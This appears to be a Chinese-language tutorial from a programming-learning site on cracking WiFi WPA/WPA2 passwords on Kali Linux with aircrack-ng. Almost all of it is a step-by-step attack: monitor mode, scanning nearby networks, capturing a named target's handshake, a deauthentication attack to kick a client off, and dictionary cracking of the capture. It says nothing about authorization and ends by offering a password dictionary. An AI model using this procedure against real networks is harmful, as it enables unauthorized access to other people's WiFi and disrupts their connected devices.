當前位置:編程學習大全網 - 腳本源碼 - Kali系統使用Aircrack-ng進行暴力破解WIFI密碼

Kali系統使用Aircrack-ng進行暴力破解WIFI密碼

Aircrack-ng是壹個與802.11標準的無線網絡分析有關的安全軟件,主要功能有:網絡偵測,數據包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監聽模式的無線網卡上(設備列表請參閱其官方網站)並嗅探802.11a,802.11b,802.11g的數據。該程序可運行在Linux和Windows上。Linux版本已經被移植到了Zaurus和Maemo系統平臺, 並概念驗證可移植到iPhone。

使用Kali 2021.3進行演示操作

軟件: aircrack-ng (Kali系統內置)

外置無線網卡設備: 要支持監聽,支持Linux並且免驅(我這裏使用的是RT3070)

命令: <code>sudo su</code>

解釋: 不在管理員模式下運行可能會有權限不夠的提示

命令: <code>iwconfig/ifconfig</code>

解釋: iwconfig查看網卡的信息、ifconfig查看新連接的設備

wlan0就是我們的無線網卡

命令: <code>airmon-ng check kill</code>

解釋: 殺死進程可以讓搜索更準確,不會受到影響

命令: <code>airmon-ng</code>

出現妳的網卡信息就說明妳的網卡支持監聽

命令: <code>airmon-ng start wlan0</code>

解釋: start 開啟哪個接口 wlan0 是接口的名字

再用iwconfig查看壹下網卡信息,wlan0後面多了個mon,wlan0mon就說明已經開啟監聽了

命令: <code>airodump-ng wlan0mon</code>

解釋: BSSID:WIFI的MAC地址、PWR:信號強度(值越小信號強度強)、Data:監聽期間流量總合、CH:信道、ENC:加密算法、ESSID:WIFI名稱

命令: <code>airodump-ng -c (頻道號) --bssid (MAC地址) -w (抓取的數據包的保存位置) wlan0mon</code>

解釋:

我要破解的目標網絡是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目錄下創建了壹個名為1的文件夾

輸入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon

當新的客戶端連接時,客戶端輸入密碼連接就可以抓到握手包,右上角出現WPA時就表示已經抓到了對方的握手包

命令: <code>aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon</code>

解釋:

執行命令<code>aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon</code>

捕捉到握手包時就停止攻擊

命令: <code>aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap</code>

解釋:

最後就是等待跑字典了,下面就是破解的WIFI密碼

命令: <code>airmon-ng stop wlan0mon</code>

在監聽模式下,kali不能連接網絡

插入網卡,如果查看不到網卡信息,可以點開連接WIFI看壹下能否搜索到附近的網絡,如果不行那就右鍵系統可移動設備-把網卡斷開再重新連接壹下

插入網卡,打開網卡的監聽模式,搜索附近的WIFI,獲取握手包,最後跑字典破解握手包,這裏給大家提供壹個常用的密碼字典

  • 上一篇:醒圖有壹個圓圈放大鏡怎麽弄
  • 下一篇:華為p20pro參數
  • copyright 2024編程學習大全網